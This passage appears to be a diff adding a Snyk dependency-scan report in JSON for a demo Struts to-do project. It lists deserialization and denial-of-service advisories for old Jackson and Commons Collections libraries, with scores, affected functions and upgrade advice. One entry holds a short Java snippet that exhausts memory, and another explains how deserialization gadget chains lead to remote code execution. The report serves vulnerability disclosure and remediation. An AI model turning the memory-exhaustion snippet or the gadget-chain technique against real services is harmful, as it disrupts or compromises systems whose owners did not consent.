"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": 
"critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": 
"critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + 
"assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": 
"Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": 
"SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + 
"type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
